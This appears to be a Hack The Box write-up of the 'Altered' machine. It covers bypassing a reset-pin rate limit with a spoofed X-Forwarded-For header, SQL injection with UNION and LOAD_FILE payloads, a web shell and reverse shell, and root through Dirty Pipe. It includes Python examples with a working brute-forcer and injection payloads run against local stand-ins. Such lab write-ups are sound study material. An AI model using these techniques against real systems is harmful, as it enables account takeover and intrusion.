In this post, I would like to share a walkthrough of the Altered machine from Hack The Box.


This machine is rated Hard on Hack The Box.

What will you gain from the Altered machine?


For the user flag, you need to abuse the password reset function, which requires bypassing its rate limit with an HTTP header. After logging in to the dashboard, we need to find the endpoint that is vulnerable to SQL injection.


As for the root flag, you need to abuse the Dirty Pipe kernel vulnerability (CVE-2022-0847).

Information Gathering on Altered Machine


Once we have started the VPN connection (the configuration file is downloaded from Hack The Box), we can start information gathering on the machine by running nmap -sC -sV -p- -Pn <IP Address>


I found that only two ports are open: SSH and HTTP.


Let’s access the website interface.


A login page is shown when we access the website. Sadly, we don’t have any credentials to play with.


So let’s try common credentials such as admin:admin.


However, we get an error saying “Invalid Password”.


Let’s inspect the response to that request.


Nothing looks promising to me.


Let’s reset the password by clicking “Forgot password”.


Let’s also look at the response to that request; nothing looks unusual to me.


We are required to enter a pincode, which we don’t have yet.


I did notice two cookies, XSRF-TOKEN and laravel_session, which tells us the application is built on Laravel.


Therefore, let’s try to brute-force the pincode using wfuzz.

Brute-force the pincode


From the wfuzz output, the responses of 6625 characters stand out, so let’s look at one of them.


It turns out the website is returning an error saying “Too Many Requests”: the pincode endpoint is rate-limited per client IP.


To get around this, we can create a list of IP addresses (only the last octet needs to change) and send each attempt with a different client address in an HTTP header such as X-Forwarded-For, so that the throttle sees a new client every few requests.


However, we first got output that we were not expecting.


After a few hours of troubleshooting, we managed to get the output we wanted, which reveals the valid pincode.
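The brute force the post describes, reduced to a runnable model, as an added example that is not part of the original walkthrough: a constructed stand-in for the pincode endpoint throttles per client IP but trusts the X-Forwarded-For header, and the brute-forcer rotates that header every few requests, which is what feeding wfuzz a list of IP endings as a second payload achieves. The header name, the 4-digit pincode length, the limit of 60 attempts per IP and every address in the block are assumptions, not details taken from the post.

```python
import itertools
from collections import defaultdict

PIN_LENGTH = 4      # assumption: the post does not state the pincode length
LIMIT_PER_IP = 60   # assumption: attempts allowed per client IP before a 429


class ThrottledResetEndpoint:
    """Constructed stand-in for the pincode step of the password reset.

    It imitates a Laravel-style throttle middleware that keys the limit on the
    client address, where the application trusts X-Forwarded-For (the
    misconfiguration this example assumes). When the header is present it wins
    over the real socket address, so the attacker chooses the throttle key.
    """

    def __init__(self, correct_pin: str):
        self.correct_pin = correct_pin
        self.attempts = defaultdict(int)

    def submit(self, pin: str, headers: dict, socket_ip: str = "10.10.14.1"):
        client_ip = headers.get("X-Forwarded-For", socket_ip)
        self.attempts[client_ip] += 1
        if self.attempts[client_ip] > LIMIT_PER_IP:
            return 429, "Too Many Requests"
        if pin == self.correct_pin:
            return 302, "redirect to change-password"
        return 200, "Invalid pincode"


def brute_force_pin(endpoint, pin_length=PIN_LENGTH, spoof_header=True):
    """Try every pincode in order.

    With spoof_header=True, the X-Forwarded-For value changes every
    LIMIT_PER_IP requests, varying only the last octet (like the short IP list
    the post builds for wfuzz), so no single key ever exceeds the limit.
    Returns (pin, requests_sent); pin is None if the endpoint locked us out.
    """
    sent = 0
    for idx, digits in enumerate(itertools.product("0123456789", repeat=pin_length)):
        pin = "".join(digits)
        headers = {}
        if spoof_header:
            headers["X-Forwarded-For"] = f"192.168.1.{(idx // LIMIT_PER_IP) % 256}"
        status, _ = endpoint.submit(pin, headers)
        sent += 1
        if status == 429:
            # rate limited and no way around it: stop instead of burning time
            return None, sent
        if status == 302:
            return pin, sent
    return None, sent


if __name__ == "__main__":
    print(brute_force_pin(ThrottledResetEndpoint("7342"), spoof_header=False))  # (None, 61)
    print(brute_force_pin(ThrottledResetEndpoint("7342")))  # ('7342', 7343)
```

The bypass only works when the application resolves the client address from the header, for example a Laravel application whose TrustProxies middleware trusts every proxy; if the throttle is keyed on the real socket address, rotating the header changes nothing, and the early return on 429 makes that visible immediately instead of silently sending thousands of requests that never reach the pin check.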


After entering the pincode in the correct field, we are redirected to a page where we can change the password.


Let’s log in using the password we just set.


At last, we have access to the dashboard.


We can see that each player has a different description.


Therefore, let’s inspect the request in Burp Suite.


Let’s copy the id=&secret= parameters at the bottom of the request.


We need to modify the request body from those form parameters into a JSON payload.

Enumerating with SQL injection


We can try a common SQL injection test such as OR 1=1-- - in the id value, and I notice that the Altered website is vulnerable to it: the injected condition is evaluated by the database.


We can extract the schema name from the database.


We can extract the table names from the database.


Aside from that, we can also retrieve the usernames and passwords from the database, but they do not look useful at all.


Since we know the endpoint is vulnerable to SQL injection, let’s use the LOAD_FILE() function (MySQL) to read files from the server; this only works if the database user has the FILE privilege.
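The injection and the enumeration queries above, as an added example that is not from the post: an in-memory SQLite database with constructed data stands in for the target’s MySQL database, a string-built lookup reproduces the vulnerable id=&secret= endpoint next to a parameterised one, and the payload constants show how OR 1=1, a UNION over the catalogue table and a dump of the users table behave. The MySQL equivalents (information_schema, LOAD_FILE) are given in comments, and the Nginx configuration path in them is an assumption.

```python
import sqlite3


def make_db():
    """Constructed in-memory stand-in for the site's database (SQLite here;
    the real target is MySQL, so the MySQL payloads are given in comments)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE players (id INTEGER PRIMARY KEY, secret TEXT, description TEXT);
        INSERT INTO players VALUES (1, 's3cr3t-1', 'Player one description');
        INSERT INTO players VALUES (2, 's3cr3t-2', 'Player two description');
        CREATE TABLE users (id INTEGER, username TEXT, password TEXT);
        INSERT INTO users VALUES (1, 'admin', '$2y$10$not-a-useful-hash');
    """)
    return conn


def get_profile_vulnerable(conn, player_id, secret):
    """The endpoint as the post finds it: id and secret pasted into the query."""
    sql = (f"SELECT id, description FROM players "
           f"WHERE id={player_id} AND secret='{secret}'")
    return conn.execute(sql).fetchall()


def get_profile_safe(conn, player_id, secret):
    """Hardened version: numeric id enforced, both values bound as parameters."""
    player_id = int(player_id)  # raises ValueError on 'OR 1=1-- -' style input
    sql = "SELECT id, description FROM players WHERE id=? AND secret=?"
    return conn.execute(sql, (player_id, secret)).fetchall()


# Injection payloads for the id value. The secret is irrelevant because '-- -'
# comments out the rest of the query.
ALL_ROWS = "0 OR 1=1-- -"
# MySQL: 0 UNION SELECT 1,group_concat(table_name) FROM information_schema.tables
#        WHERE table_schema=database()-- -
TABLE_NAMES = "0 UNION SELECT 1, group_concat(name) FROM sqlite_master WHERE type='table'-- -"
# MySQL: 0 UNION SELECT 1,group_concat(username,':',password) FROM users-- -
DUMP_USERS = "0 UNION SELECT 1, username || ':' || password FROM users-- -"
# MySQL only (needs the FILE privilege and a permissive secure_file_priv):
#   0 UNION SELECT 1,LOAD_FILE('/etc/nginx/sites-enabled/default')-- -
# (path assumed; SQLite has no LOAD_FILE, so it is not demonstrated here)


if __name__ == "__main__":
    db = make_db()
    print(get_profile_vulnerable(db, ALL_ROWS, "x"))     # both players
    print(get_profile_vulnerable(db, TABLE_NAMES, "x"))  # [(1, 'players,users')]
    print(get_profile_vulnerable(db, DUMP_USERS, "x"))   # admin and its hash
    print(get_profile_safe(db, 1, "s3cr3t-1"))           # the legitimate lookup
```

The UNION payloads keep the column count (two) and put the extracted text in the column the page renders, which is how the schema name, the table names and the user rows come back through the player description.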


Let’s check the Nginx configuration for any extra directory or URL that has been defined.


I notice that a Laravel application is stored on the server.


Let’s try to drop a shell file on the machine so we can get a reverse shell.


Sadly, the file is not found when we request it through the website.


After a few minutes of troubleshooting, I wondered whether we need the $ symbol before cmd.


And it works like a charm!


We need to inspect the request in Burp Suite and change the request method.


Let’s start our nc listener.

Let’s send a reverse shell through the request.

After URL-encoding the reverse shell, it still doesn’t work at all.


Maybe we need to prefix our actual reverse shell with bash -c, since the command is run through /bin/sh, which does not support the bash-only /dev/tcp redirection. After sending the request, it hangs without a response, which is a good sign: the command is holding the connection open.


We got the reverse shell connection back to us.


We can read the user flag by executing the cat /home/htb/user.txt command.

Escalate to root privileges on the Altered machine


Let’s check the common directories where SUID binaries are usually stored.


Sadly, we cannot find any interesting SUID binary.


The same goes for ps aux: nothing interesting is running.


Let’s check the kernel version.


We don’t have a password for www-data, or for any other user.


Running su - just prompts for a password, so guessing is a dead end.


From the kernel version, I am aware that this release can be exploited with the Dirty Pipe vulnerability (CVE-2022-0847), so I did some research on it. Dirty Pipe affects Linux 5.8 and later and was fixed in 5.16.11, 5.15.25 and 5.10.102; distributions backport fixes, so the version string is only a hint and running the exploit is the real test.


We need to download the exploit onto our own machine.


For this machine, I will use only the second exploit, the variant that needs an existing SUID binary on the target.


Therefore, we need to compile the code on our machine.


Let’s transfer the compiled binary to the victim machine.


Let’s give the file execute permission.


The exploit requires a SUID binary on the target to escalate to root.


Let’s find a suitable root-owned SUID binary that we can abuse.


Let’s run the exploit against that binary.


We managed to get access as root.


We can read the root flag by executing the “cat root.txt” command.